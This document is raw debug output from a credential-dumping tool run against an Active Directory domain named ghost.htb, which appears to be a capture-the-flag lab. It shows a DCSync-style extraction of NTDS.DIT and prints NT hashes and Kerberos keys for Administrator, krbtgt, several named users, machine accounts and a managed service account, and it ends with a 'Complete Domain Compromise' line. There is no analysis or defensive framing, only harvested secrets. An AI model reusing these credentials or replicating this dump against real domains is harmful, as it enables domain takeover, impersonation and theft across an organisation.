_SC_GMSA_{84A78B8C-56EE-465b-8496-FFB35A1B52A7}_ee4cab5223967daca72a9fc555816b05afedd0b470e337963aef35e5eb7f13ff:01000000240200001000120114021c02ec7aee326860e83b0d6375058c5122f7e347a0352aa56849eae1d796be3aa060cf603e403c71a012cc72ded4d46fcbba00bb6179809eecaa054c3739455941ab02eb67f924af6fb9b7519ad37b4b980e7ed2b85cb083b93287a063d56067dbff4bbce5f90ea0c7fc39b9838a0cc3dbd96ccec9f39ca0edf6cbea121de0b192ada68f79c33db67e2ac022f95ba6dd04ce358ae7257acd3b81978e7afb744bf0a3224d9d520ecc30acbe1cd8e39bd33d5e04887bcb1ffbac4b7b57f9fca8a5c0d28a571501808dbb825a8c1e40c9016be3ed765b7d2ec65e5e30fe92755153fa4035cc27c6bcbed9143f28c5a09e8476ef377eddb775ea8e74ab4fb1e7bd7418890000a09cc7d44d7e232af8dc3560800186a675e6d39895a23d485e0c45dcd7b05632e41df6b48b32f2c1082b8f2a80555d0d4d71325b26f1af6edf90e778241d3ba66f1904866df0a4f9c203bc7c30026722b28b95569531d52b3a3a7843feaff7db523f53c29ab983cd625d808afc684fee3ccef828e4e10eb729b3cde6a57fcdb8090e11484b57e763facd9005c4b836cc38d6549a11598c40a99f33d901a358e7714b332f0749196d5a175b313e69ec715fb701409a0502b7158d54080827c3a8f1b6d3cde6e761f69293303d84f0afe070c9733878220c2b716e84bee79f02da34c3b3c7ec7b5a6fe03b3579c6201d8449d2635e8089b44e979e896271306fd000004ea3bf98620a00004e45efe5610a0000
[+] Looking into _SC_MSSQLSERVER
[+] Discarding secret _SC_MSSQLSERVER, NULL Data
[+] Looking into _SC_SQLTELEMETRY
[+] Discarding secret _SC_SQLTELEMETRY, NULL Data
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[+] Session resume file will be sessionresume_tUwkAjEJ
[+] Calling DRSGetNCChanges for S-1-5-21-4084500788-938703357-3654145966-500
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=Administrator,CN=Users,DC=ghost,DC=htb
Administrator:500:aad3b435b51404eeaad3b435b51404ee:1cdb17d5c14ff69e7067cffcc9e470bd:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSGetNCChanges for S-1-5-21-4084500788-938703357-3654145966-501
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=Guest,CN=Users,DC=ghost,DC=htb
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSGetNCChanges for S-1-5-21-4084500788-938703357-3654145966-502
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=krbtgt,CN=Users,DC=ghost,DC=htb
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0cdb6ae71c3824f2da2815f69485e128:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSGetNCChanges for S-1-5-21-4084500788-938703357-3654145966-3602
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=Kathryn Holland,CN=Users,DC=ghost,DC=htb
kathryn.holland:3602:aad3b435b51404eeaad3b435b51404ee:0adf6114ba230ef8f023eca3c0d1af50:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSGetNCChanges for S-1-5-21-4084500788-938703357-3654145966-3603
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=Cassandra Shelton,CN=Users,DC=ghost,DC=htb
cassandra.shelton:3603:aad3b435b51404eeaad3b435b51404ee:96d2251e44e42816314c08b8e1f11b87:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSGetNCChanges for S-1-5-21-4084500788-938703357-3654145966-3604
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=Robert Steeves,CN=Users,DC=ghost,DC=htb
robert.steeves:3604:aad3b435b51404eeaad3b435b51404ee:7e2e1e1163ff3fa9304ecd8df6f726fe:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSGetNCChanges for S-1-5-21-4084500788-938703357-3654145966-3606
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=Florence Ramirez,CN=Users,DC=ghost,DC=htb
florence.ramirez:3606:aad3b435b51404eeaad3b435b51404ee:29542931896c7e7a9fbca17b0dd8ab6a:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSGetNCChanges for S-1-5-21-4084500788-938703357-3654145966-3607
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=Justin Bradley,CN=Users,DC=ghost,DC=htb
justin.bradley:3607:aad3b435b51404eeaad3b435b51404ee:a2be8ec65d6b212138cb36422ed32f46:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSGetNCChanges for S-1-5-21-4084500788-938703357-3654145966-3608
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=Arthur Boyd,CN=Users,DC=ghost,DC=htb
arthur.boyd:3608:aad3b435b51404eeaad3b435b51404ee:b5b7f0787f3c07f42958d33518ae19a5:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSGetNCChanges for S-1-5-21-4084500788-938703357-3654145966-3610
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=Beth Clark,CN=Users,DC=ghost,DC=htb
beth.clark:3610:aad3b435b51404eeaad3b435b51404ee:1582f51fcd02e2e5316d497f2552bb83:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSGetNCChanges for S-1-5-21-4084500788-938703357-3654145966-3611
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=Charles Gray,CN=Users,DC=ghost,DC=htb
charles.gray:3611:aad3b435b51404eeaad3b435b51404ee:d2fe7f2c7484fc550cac49836eabca3d:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSGetNCChanges for S-1-5-21-4084500788-938703357-3654145966-3612
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=Jason Taylor,CN=Users,DC=ghost,DC=htb
jason.taylor:3612:aad3b435b51404eeaad3b435b51404ee:0159e6bd4326812f9a6c406ea84035e6:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSGetNCChanges for S-1-5-21-4084500788-938703357-3654145966-3614
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=Intranet Principal,CN=Users,DC=ghost,DC=htb
intranet_principal:3614:aad3b435b51404eeaad3b435b51404ee:e9fac15124e1d927cbd71f851792b04f:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSGetNCChanges for S-1-5-21-4084500788-938703357-3654145966-3615
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=Gitea_Temp Principal,CN=Users,DC=ghost,DC=htb
gitea_temp_principal:3615:aad3b435b51404eeaad3b435b51404ee:2058fa4502750fa5d7ebd874b1ea43a1:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSGetNCChanges for S-1-5-21-4084500788-938703357-3654145966-1000
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=DC01,OU=Domain Controllers,DC=ghost,DC=htb
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:e6c3d61860f92e30e8e9744ac5d9783b:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSGetNCChanges for S-1-5-21-4084500788-938703357-3654145966-3630
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=LINUX-DEV-WS01,CN=Computers,DC=ghost,DC=htb
LINUX-DEV-WS01$:3630:aad3b435b51404eeaad3b435b51404ee:99a4b6cd1b3b683755ca4326328749b3:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSGetNCChanges for S-1-5-21-4084500788-938703357-3654145966-4101
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=adfs_gmsa,CN=Managed Service Accounts,DC=ghost,DC=htb
adfs_gmsa$:4101:aad3b435b51404eeaad3b435b51404ee:4f4b81c5f6a9c1931310ece55a02a8d6:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSGetNCChanges for S-1-5-21-4084500788-938703357-3654145966-2101
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=GHOST-CORP$,CN=Users,DC=ghost,DC=htb
GHOST-CORP$:2101:aad3b435b51404eeaad3b435b51404ee:ea9624f8fd9e315cf07b7635631fea81:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Finished processing and printing user's hashes, now printing supplemental information
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:83d3226d3b2b12e89df0470c2c245fec1de69ee73195d907ed49c125a925ee76
Administrator:aes128-cts-hmac-sha1-96:44ca6c3d49fe2089d5dc5fe4f4a9f8cb
Administrator:des-cbc-md5:9de66dcbcbf8ae92
krbtgt:aes256-cts-hmac-sha1-96:2d753565cb0e7c60787b71b64a2bb6c7ec4aad554f520782c00dedd9f8efd51a
krbtgt:aes128-cts-hmac-sha1-96:a37d74f126e6f7da7f916b90403f4c73
krbtgt:des-cbc-md5:4f4cea5134df672a
kathryn.holland:aes256-cts-hmac-sha1-96:bb344e4276a9bec1137ed98d0848711cf7501c611ff50e39fb64e6238ebe9670
kathryn.holland:aes128-cts-hmac-sha1-96:af3b44ab8de1546bad51aa67bedf737b
kathryn.holland:des-cbc-md5:9b0b1c32fbe5d601
cassandra.shelton:aes256-cts-hmac-sha1-96:d2e2d7d2b410a77f0b89697f11f48009fb3ad3339f5e8e9588ecd4cb8b6c2a80
cassandra.shelton:aes128-cts-hmac-sha1-96:85d10b93011d9bf916c62301824d6c01
cassandra.shelton:des-cbc-md5:ba16fda8df52f297
robert.steeves:aes256-cts-hmac-sha1-96:21fa7d9b64f2858c8db1d3314ba8bb134677f9033fccfeaa88546d4f97d83c6c
robert.steeves:aes128-cts-hmac-sha1-96:67975e221fe0a0cebaf0add64a875433
robert.steeves:des-cbc-md5:c13e9ba2705bd398
florence.ramirez:aes256-cts-hmac-sha1-96:1289980d0bec171109ec640219279874334bebd1318aa072b5e7f3428dad198e
florence.ramirez:aes128-cts-hmac-sha1-96:1d3c8a95037580f3b7be57929a7ab177
florence.ramirez:des-cbc-md5:4ac83285ce5b2c0e
justin.bradley:aes256-cts-hmac-sha1-96:80714d87657f38e85c81742e1a68043d5d2f5cc68fd997555762e1a9d92b77ba
justin.bradley:aes128-cts-hmac-sha1-96:ea24795394bb6fadfb29277fd3c2630a
justin.bradley:des-cbc-md5:08156d73d31f6b4a
arthur.boyd:aes256-cts-hmac-sha1-96:01b137754a7664fc6f3dd4a735ae57c963172fc66a3983fff10a3ac7bca810e7
arthur.boyd:aes128-cts-hmac-sha1-96:b0e21a76869a6ef61a2934f047991bca
arthur.boyd:des-cbc-md5:cb644f519edf8079
beth.clark:aes256-cts-hmac-sha1-96:2666f06d2c1cc776aa5f36319a829491036ddd3faf31b91b4a54c759797ca13c
beth.clark:aes128-cts-hmac-sha1-96:f85a08977f96b9a785e537d67c161b12
beth.clark:des-cbc-md5:f732ef156ecd38d3
charles.gray:aes256-cts-hmac-sha1-96:66f1ac768fbdd2dc8ce5b1db31a07db6b194043ade26ebe8410b49d082498963
charles.gray:aes128-cts-hmac-sha1-96:3decbd0ea7a41bfc3faf31d6ba41631f
charles.gray:des-cbc-md5:f4345b029767bc54
jason.taylor:aes256-cts-hmac-sha1-96:94bc50eff4ee4c008f4db64836d5bf516dd6ac638927ec26029b4d9c053368b3
jason.taylor:aes128-cts-hmac-sha1-96:fc5ccdf9e506010c2942bb98f35fce08
jason.taylor:des-cbc-md5:d668133bb33446bc
intranet_principal:aes256-cts-hmac-sha1-96:e4789461db237d0162bfa21a9baeadbe69a25df7e81fc3fbc538a85396ff64e0
intranet_principal:aes128-cts-hmac-sha1-96:327d1bcbc2e684cfdf5884b79c8e2dff
intranet_principal:des-cbc-md5:d9aba74057435ef2
gitea_temp_principal:aes256-cts-hmac-sha1-96:351c63c5870d212b7a3feac31b6a80e6fb55036ead4da737177597a42939c249
gitea_temp_principal:aes128-cts-hmac-sha1-96:d70cc894c2388dd4c3b67731dafcf733
gitea_temp_principal:des-cbc-md5:512338250b8c4fd0
DC01$:aes256-cts-hmac-sha1-96:15052f0a46c62d5a1eea1dc98ce9367f2aeb1e4328f14aa1b86d3a6b760f07ba
DC01$:aes128-cts-hmac-sha1-96:462f64af96c7b965cc508d26679ee09c
DC01$:des-cbc-md5:c82646c8c791ae70
LINUX-DEV-WS01$:aes256-cts-hmac-sha1-96:2ea6c4f742f7da4f20b72cd699640572d2bc29cad7fd9050df96d9bf8890cba6
LINUX-DEV-WS01$:aes128-cts-hmac-sha1-96:70b470828ad94ca1a94961ab20a37247
LINUX-DEV-WS01$:des-cbc-md5:9889085e49209845
adfs_gmsa$:aes256-cts-hmac-sha1-96:fe641d9fcb8c2652d7bcaa8ae30c1a532742c634d562466eba7a2e799812f036
adfs_gmsa$:aes128-cts-hmac-sha1-96:a29e31f574541765a26cfde4a3070810
adfs_gmsa$:des-cbc-md5:bcdcda135492643e
GHOST-CORP$:aes256-cts-hmac-sha1-96:248f724ab13eb6a7313929f793412281dc85b99bfb00578d23b681170301c04f
GHOST-CORP$:aes128-cts-hmac-sha1-96:cbdc20f89a7571cd40083b1deda41734
GHOST-CORP$:des-cbc-md5:f7465b64bf088c38
[*] Cleaning up...
[*] Stopping service RemoteRegistryComplete Domain Compromise